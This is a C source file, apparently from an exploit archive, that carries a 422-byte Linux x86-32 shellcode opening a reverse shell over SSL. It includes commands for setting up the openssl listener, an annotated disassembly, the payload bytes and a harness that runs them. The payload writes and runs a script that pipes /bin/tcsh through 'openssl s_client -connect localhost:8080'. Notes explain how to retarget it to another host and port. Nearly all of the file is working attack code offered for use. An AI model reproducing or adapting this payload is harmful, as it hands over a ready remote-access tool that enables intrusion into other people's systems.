
/*

**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**

Title:      Linux/x86-32 - ConnectBack with SSL connection - 422 bytes
Date:       2011-06-08
Tested on:  ArchLinux i686
Author:     Jonathan Salwan - twitter: @jonathansalwan
            http://shell-storm.org
Server configuration (self-signed certificate for openssl s_server)
===========================================================================
jonathan@ArchLinux [ssl] $ openssl genrsa -des3 -out server.key 1024
jonathan@ArchLinux [ssl] $ openssl req -new -key server.key -out server.csr
jonathan@ArchLinux [ssl] $ cp server.key server.key.org
jonathan@ArchLinux [ssl] $ openssl rsa -in server.key.org -out server.key
jonathan@ArchLinux [ssl] $ openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt
jonathan@ArchLinux [ssl] $ ll
total 16
-rw-r--r-- 1 jonathan users 757 Jun 8 09:36 server.crt
-rw-r--r-- 1 jonathan users 603 Jun 8 09:36 server.csr
-rw-r--r-- 1 jonathan users 887 Jun 8 09:36 server.key
-rw-r--r-- 1 jonathan users 963 Jun 8 09:36 server.key.org
jonathan@ArchLinux [ssl] $
Running the server
===========================================================================
jonathan@ArchLinux [ssl] $ openssl s_server -key server.key -cert server.crt -accept 8080
Once the server is listening, run the shellcode on the target.
Warning: the target needs tcsh and openssl installed (the dropped script runs /usr/bin/openssl and /bin/tcsh; /bin/sh runs the
script itself). Also be clear about what the "SSL" buys you: s_client is started without -verify/-CAfile, so the target never
checks the server certificate — the hop is hidden from passive observers, but an active man-in-the-middle can terminate it.
The 1024-bit RSA key generated above is below today's minimums (use 2048 bits or more; some distributions' default OpenSSL
security level will refuse to negotiate with it).
Shellcode information
===========================================================================
Reverse TCP with SSL (why not)
Linux x86 32bits
422 bytes

What the payload does (see the listing below):
  1. unlink("/tmp/backpipe") and unlink("/tmp/cbsl"); after each one, if the call returned 0, write(1, "<path> deleted\n").
     The "\n" was not translated by the assembler (bytes 0x5c 0x6e), so the notices end in a literal backslash-n, no newline.
  2. open("/tmp/cbsl", 0x441 = O_WRONLY|O_CREAT|O_TRUNC, 0x1a4 = 0644); the descriptor is kept in %esi.
  3. write() the 118-byte script plus its pushed NUL (count 0x77 = 119):
       mknod /tmp/backpipe p && /usr/bin/openssl s_client -connect localhost:8080 0</tmp/backpipe | /bin/tcsh 1>/tmp/backpipe
  4. close(fd); execve("/bin/sh", {"/bin/sh", "-e", "/tmp/cbsl", NULL}, NULL); exit(0).
Operational caveats: both paths are fixed and predictable. /tmp/cbsl is created 0644 and without O_EXCL, so the unlink/open
pair is racy against a link planted in /tmp by another local user, and the script — connect-back address included — is
world-readable. The FIFO is created by mknod with whatever the umask allows, so a local user may be able to read from or
inject into the session through /tmp/backpipe. The "deleted" notices go to stdout, which is noisy on a target.
ASM sources
===========================================================================
08048054 <main>:
 unlink("/tmp/backpipe"): syscall 10, %ebx -> the path just pushed. The notice below is written only if unlink returned 0
 (the file existed and was removed); otherwise jump to del2.
 8048054:  31 c0              xor    %eax,%eax
 8048056:  50                 push   %eax
 8048057:  6a 65              push   $0x65
 8048059:  68 6b 70 69 70     push   $0x7069706b
 804805e:  68 2f 62 61 63     push   $0x6361622f
 8048063:  68 2f 74 6d 70     push   $0x706d742f
 8048068:  89 e3              mov    %esp,%ebx
 804806a:  b0 0a              mov    $0xa,%al
 804806c:  cd 80              int    $0x80
 804806e:  85 c0              test   %eax,%eax
 8048070:  75 32              jne    80480a4 <del2>

**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**

 write(1, "/tmp/backpipe deleted\n", 0x17): the pushed bytes 5c 6e are a literal backslash and 'n', not a newline, and the
 count of 23 leaves out the pushed NUL (the del2 notice below counts it — the two are inconsistent).
 8048072:  31 c0              xor    %eax,%eax
 8048074:  31 db              xor    %ebx,%ebx
 8048076:  31 d2              xor    %edx,%edx
 8048078:  b3 01              mov    $0x1,%bl
 804807a:  31 c0              xor    %eax,%eax
 804807c:  50                 push   %eax
 804807d:  6a 6e              push   $0x6e
 804807f:  66 68 64 5c        pushw  $0x5c64
 8048083:  68 6c 65 74 65     push   $0x6574656c
 8048088:  68 65 20 64 65     push   $0x65642065
 804808d:  68 6b 70 69 70     push   $0x7069706b
 8048092:  68 2f 62 61 63     push   $0x6361622f
 8048097:  68 2f 74 6d 70     push   $0x706d742f
 804809c:  89 e1              mov    %esp,%ecx
 804809e:  b2 17              mov    $0x17,%dl
 80480a0:  b0 04              mov    $0x4,%al
 80480a2:  cd 80              int    $0x80
080480a4 <del2>:
 unlink("/tmp/cbsl"); if it returned 0, write(1, "/tmp/cbsl deleted\n", 0x14) — again a literal "\n" (5c 6e); the count of 20
 here does include the pushed NUL. Otherwise jump straight to open.
 80480a4:  31 c0              xor    %eax,%eax
 80480a6:  50                 push   %eax
 80480a7:  66 68 73 6c        pushw  $0x6c73
 80480ab:  68 2f 63 62 73     push   $0x7362632f
 80480b0:  68 2f 74 6d 70     push   $0x706d742f
 80480b5:  89 e3              mov    %esp,%ebx
 80480b7:  b0 0a              mov    $0xa,%al
 80480b9:  cd 80              int    $0x80
 80480bb:  85 c0              test   %eax,%eax
 80480bd:  75 2a              jne    80480e9 <open>
 80480bf:  31 c0              xor    %eax,%eax
 80480c1:  31 db              xor    %ebx,%ebx
 80480c3:  31 d2              xor    %edx,%edx
 80480c5:  50                 push   %eax
 80480c6:  68 65 64 5c 6e     push   $0x6e5c6465
 80480cb:  68 65 6c 65 74     push   $0x74656c65
 80480d0:  68 73 6c 20 64     push   $0x64206c73
 80480d5:  68 2f 63 62 73     push   $0x7362632f
 80480da:  68 2f 74 6d 70     push   $0x706d742f
 80480df:  89 e1              mov    %esp,%ecx
 80480e1:  b3 01              mov    $0x1,%bl
 80480e3:  b2 14              mov    $0x14,%dl
 80480e5:  b0 04              mov    $0x4,%al
 80480e7:  cd 80              int    $0x80

080480e9 <open>:
 open("/tmp/cbsl", 0x441 = O_WRONLY|O_CREAT|O_TRUNC, 0x1a4 = 0644) — no O_EXCL, so a pre-planted link at that path is
 followed. The returned descriptor is saved in %esi for the write and close blocks.
 80480e9:  31 c0              xor    %eax,%eax
 80480eb:  31 c9              xor    %ecx,%ecx
 80480ed:  31 d2              xor    %edx,%edx
 80480ef:  66 b9 41 04        mov    $0x441,%cx
 80480f3:  66 ba a4 01        mov    $0x1a4,%dx
 80480f7:  50                 push   %eax
 80480f8:  66 68 73 6c        pushw  $0x6c73
 80480fc:  68 2f 63 62 73     push   $0x7362632f
 8048101:  68 2f 74 6d 70     push   $0x706d742f
 8048106:  89 e3              mov    %esp,%ebx
 8048108:  b0 05              mov    $0x5,%al
 804810a:  cd 80              int    $0x80
 804810c:  89 c6              mov    %eax,%esi

(stray byte columns of the 8048072-80480a2 listing above, as the extraction left them:
 6e 68 6c 65 6b 2f 2f e1 17 04 80 / 64 65 20 70 62 74 / 5c 74 64 69 61 6d / 65 65 70 63 70)

0804810e <wtite>:        (label typo kept from the original source: this is the write() block)

**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**

 write(%esi, script, 0x77): %ebx <- the /tmp/cbsl descriptor saved in %esi; the script is pushed in 4-byte chunks starting
 from its end, so read the immediates bottom-up. The first chunks are " 0</tmp/backpipe | /bin/tcsh 1>/tmp/backpipe".
 804810e:  31 d2              xor    %edx,%edx
 8048110:  89 f3              mov    %esi,%ebx
 8048112:  31 c0              xor    %eax,%eax
 8048114:  50                 push   %eax
 8048115:  66 68 70 65        pushw  $0x6570
 8048119:  68 63 6b 70 69     push   $0x69706b63
 804811e:  68 70 2f 62 61     push   $0x61622f70
 8048123:  68 3e 2f 74 6d     push   $0x6d742f3e
 8048128:  68 73 68 20 31     push   $0x31206873
 804812d:  68 6e 2f 74 63     push   $0x63742f6e
 8048132:  68 20 2f 62 69     push   $0x69622f20
 8048137:  68 70 65 20 7c     push   $0x7c206570
 804813c:  68 63 6b 70 69     push   $0x69706b63
 8048141:  68 70 2f 62 61     push   $0x61622f70
 8048146:  68 3c 2f 74 6d     push   $0x6d742f3c

 The four pushes below build "localhost:8080" (\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x3a\x38\x30\x38\x30), the connect-back
 target. If you change the host:port, also change the byte count handed to write() in %edx (mov $0x77,%dl at 80481ac): it must
 equal the new script length plus 1 for the pushed NUL (the original script is 118 bytes, hence 0x77 = 119). The string is
 assembled from 4-byte pushes (plus one pushw for a 2-byte tail), so a replacement whose length is not a multiple of 4 means
 re-splitting the neighbouring chunks as well.
 804814b:  68 38 30 20 30     push   $0x30203038
 8048150:  68 74 3a 38 30     push   $0x30383a74
 8048155:  68 6c 68 6f 73     push   $0x736f686c
 804815a:  68 6c 6f 63 61     push   $0x61636f6c
 Remaining chunks, bottom-up: "mknod /tmp/backpipe p && /usr/bin/openssl s_client -connect ". Then %ecx -> script,
 %dl = 0x77 (119 bytes, script plus NUL), write() via syscall 4.
 804815f:  68 65 63 74 20     push   $0x20746365
 8048164:  68 63 6f 6e 6e     push   $0x6e6e6f63
 8048169:  68 6e 74 20 2d     push   $0x2d20746e
 804816e:  68 63 6c 69 65     push   $0x65696c63
 8048173:  68 6c 20 73 5f     push   $0x5f73206c
 8048178:  68 65 6e 73 73     push   $0x73736e65
 804817d:  68 6e 2f 6f 70     push   $0x706f2f6e
 8048182:  68 72 2f 62 69     push   $0x69622f72
 8048187:  68 20 2f 75 73     push   $0x73752f20
 804818c:  68 70 20 26 26     push   $0x26262070
 8048191:  68 69 70 65 20     push   $0x20657069
 8048196:  68 61 63 6b 70     push   $0x706b6361
 804819b:  68 6d 70 2f 62     push   $0x622f706d
 80481a0:  68 64 20 2f 74     push   $0x742f2064
 80481a5:  68 6d 6b 6e 6f     push   $0x6f6e6b6d
 80481aa:  89 e1              mov    %esp,%ecx
 80481ac:  b2 77              mov    $0x77,%dl
 80481ae:  31 c0              xor    %eax,%eax
 80481b0:  b0 04              mov    $0x4,%al
 80481b2:  cd 80              int    $0x80

080481b4 <close>:
 close(%esi) — the /tmp/cbsl descriptor.
 80481b4:  31 c0              xor    %eax,%eax
 80481b6:  b0 06              mov    $0x6,%al
 80481b8:  89 f3              mov    %esi,%ebx
 80481ba:  cd 80              int    $0x80

080481bc <execve>:
 execve setup: %ebx -> "/tmp/cbsl" (it becomes argv[2]); the rest of the argument setup and the syscall continue below.
 80481bc:  31 c0              xor    %eax,%eax
 80481be:  50                 push   %eax
 80481bf:  66 68 73 6c        pushw  $0x6c73
 80481c3:  68 2f 63 62 73     push   $0x7362632f
 80481c8:  68 2f 74 6d 70     push   $0x706d742f
 80481cd:  89 e3              mov    %esp,%ebx

**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
*/

/*
 Continuation of <execve> (re-wrapped in a comment here so the harness below still compiles):
 %ecx -> "-e", %edx -> "/bin/sh"; argv = {edx, ecx, ebx, NULL} is built by pushing NULL, %ebx, %ecx, %edx, then
 execve("/bin/sh", {"/bin/sh", "-e", "/tmp/cbsl", NULL}, NULL) via syscall 11 with envp = NULL.
 80481cf:  50                 push   %eax
 80481d0:  66 68 2d 65        pushw  $0x652d
 80481d4:  89 e1              mov    %esp,%ecx
 80481d6:  50                 push   %eax
 80481d7:  6a 68              push   $0x68
 80481d9:  66 68 2f 73        pushw  $0x732f
 80481dd:  68 2f 62 69 6e     push   $0x6e69622f
 80481e2:  89 e2              mov    %esp,%edx
 80481e4:  50                 push   %eax
 80481e5:  53                 push   %ebx
 80481e6:  51                 push   %ecx
 80481e7:  52                 push   %edx
 80481e8:  89 e1              mov    %esp,%ecx
 80481ea:  89 d3              mov    %edx,%ebx
 80481ec:  31 d2              xor    %edx,%edx
 80481ee:  b0 0b              mov    $0xb,%al
 80481f0:  cd 80              int    $0x80

080481f2 <exit>:
 exit(0), reached only if execve failed.
 80481f2:  31 c0              xor    %eax,%eax
 80481f4:  b0 01              mov    $0x1,%al
 80481f6:  31 db              xor    %ebx,%ebx
 80481f8:  cd 80              int    $0x80
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
/*
 * Payload bytes, identical to the listing above (0x8048054-0x80481f9, 422 bytes).
 * No byte is 0x00, which is the only reason strlen() below yields the right length.
 * Sequence: unlink /tmp/backpipe and /tmp/cbsl (writing a notice to stdout when
 * one existed), open /tmp/cbsl O_WRONLY|O_CREAT|O_TRUNC mode 0644, write the
 * connect-back script, close it, execve /bin/sh -e /tmp/cbsl, exit.
 * The script it drops (118 bytes, written together with its NUL) is:
 *   mknod /tmp/backpipe p && /usr/bin/openssl s_client -connect localhost:8080 0</tmp/backpipe | /bin/tcsh 1>/tmp/backpipe
 */
char SC[] = "\x31\xc0\x50\x6a\x65\x68\x6b\x70\x69\x70\x68\x2f\x62\x61\x63"
"\x68\x2f\x74\x6d\x70\x89\xe3\xb0\x0a\xcd\x80\x85\xc0\x75\x32"
"\x31\xc0\x31\xdb\x31\xd2\xb3\x01\x31\xc0\x50\x6a\x6e\x66\x68"
"\x64\x5c\x68\x6c\x65\x74\x65\x68\x65\x20\x64\x65\x68\x6b\x70"
"\x69\x70\x68\x2f\x62\x61\x63\x68\x2f\x74\x6d\x70\x89\xe1\xb2"
"\x17\xb0\x04\xcd\x80\x31\xc0\x50\x66\x68\x73\x6c\x68\x2f\x63"
"\x62\x73\x68\x2f\x74\x6d\x70\x89\xe3\xb0\x0a\xcd\x80\x85\xc0"
"\x75\x2a\x31\xc0\x31\xdb\x31\xd2\x50\x68\x65\x64\x5c\x6e\x68"
"\x65\x6c\x65\x74\x68\x73\x6c\x20\x64\x68\x2f\x63\x62\x73\x68"
"\x2f\x74\x6d\x70\x89\xe1\xb3\x01\xb2\x14\xb0\x04\xcd\x80\x31"
"\xc0\x31\xc9\x31\xd2\x66\xb9\x41\x04\x66\xba\xa4\x01\x50\x66"
"\x68\x73\x6c\x68\x2f\x63\x62\x73\x68\x2f\x74\x6d\x70\x89\xe3"
"\xb0\x05\xcd\x80\x89\xc6\x31\xd2\x89\xf3\x31\xc0\x50\x66\x68"
"\x70\x65\x68\x63\x6b\x70\x69\x68\x70\x2f\x62\x61\x68\x3e\x2f"
"\x74\x6d\x68\x73\x68\x20\x31\x68\x6e\x2f\x74\x63\x68\x20\x2f"
"\x62\x69\x68\x70\x65\x20\x7c\x68\x63\x6b\x70\x69\x68\x70\x2f"
"\x62\x61\x68\x3c\x2f\x74\x6d"
/* "localhost:8080" -- the connect-back target, four 4-byte pushes.  A host:port of a
 * different length also requires the write() count (0xb2 0x77 below) to be updated. */
"\x68\x38\x30\x20\x30\x68\x74\x3a\x38\x30\x68\x6c\x68\x6f\x73"
"\x68\x6c\x6f\x63\x61"
/* Start of the script ("mknod /tmp/backpipe p && /usr/bin/openssl s_client -connect "),
 * then the write, close, execve and exit syscalls. */
"\x68\x65\x63\x74\x20\x68\x63\x6f\x6e\x6e\x68\x6e\x74\x20\x2d"
"\x68\x63\x6c\x69\x65\x68\x6c\x20\x73\x5f\x68\x65\x6e\x73\x73"
"\x68\x6e\x2f\x6f\x70\x68\x72\x2f\x62\x69\x68\x20\x2f\x75\x73"
"\x68\x70\x20\x26\x26\x68\x69\x70\x65\x20\x68\x61\x63\x6b\x70"
"\x68\x6d\x70\x2f\x62\x68\x64\x20\x2f\x74\x68\x6d\x6b\x6e\x6f"
"\x89\xe1\xb2\x77\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x06\x89"
"\xf3\xcd\x80\x31\xc0\x50\x66\x68\x73\x6c\x68\x2f\x63\x62\x73"
"\x68\x2f\x74\x6d\x70\x89\xe3\x50\x66\x68\x2d\x65\x89\xe1\x50"

"\x6a\x68\x66\x68\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe2\x50\x53"
"\x51\x52\x89\xe1\x89\xd3\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\x31\xdb\xcd\x80";
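/*
 * Harness: report the payload length and transfer control to it.
 *
 * The original called SC in place.  SC lives in .data, which a modern
 * toolchain/kernel normally maps non-executable, so that faults with
 * SIGSEGV; instead the bytes are copied into a page-aligned buffer that
 * is then made executable with mprotect().  strlen() is a valid length
 * only because SC contains no 0x00 byte.  "%zu" is the correct conversion
 * for a size_t (the original's "%d" was a type mismatch).
 *
 * Running this executes the payload for real on the host: it deletes and
 * recreates /tmp/backpipe and /tmp/cbsl and connects back to localhost:8080.
 *
 * Returns EXIT_FAILURE if the executable buffer cannot be set up (e.g. the
 * kernel or an LSM forbids executable heap pages); otherwise control does
 * not come back, because the payload ends in exit().
 */
int main(void)
{
	size_t len = strlen(SC);
	long page = sysconf(_SC_PAGESIZE);
	size_t size;
	void *buf;

	fprintf(stdout, "Length: %zu\n", len);

	if (page <= 0) {
		perror("sysconf");
		return EXIT_FAILURE;
	}
	/* aligned_alloc() requires the size to be a multiple of the alignment. */
	size = (len + (size_t)page - 1) / (size_t)page * (size_t)page;
	buf = aligned_alloc((size_t)page, size);
	if (buf == NULL) {
		perror("aligned_alloc");
		return EXIT_FAILURE;
	}
	memcpy(buf, SC, len);

	/* Write first, then flip to R+X: never hold a writable+executable page. */
	if (mprotect(buf, size, PROT_READ | PROT_EXEC) != 0) {
		perror("mprotect");
		return EXIT_FAILURE;
	}

	/* Object-to-function pointer cast, as in the original: a common
	 * extension rather than strictly conforming C. */
	((void (*)(void))buf)();
	return 0;
}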
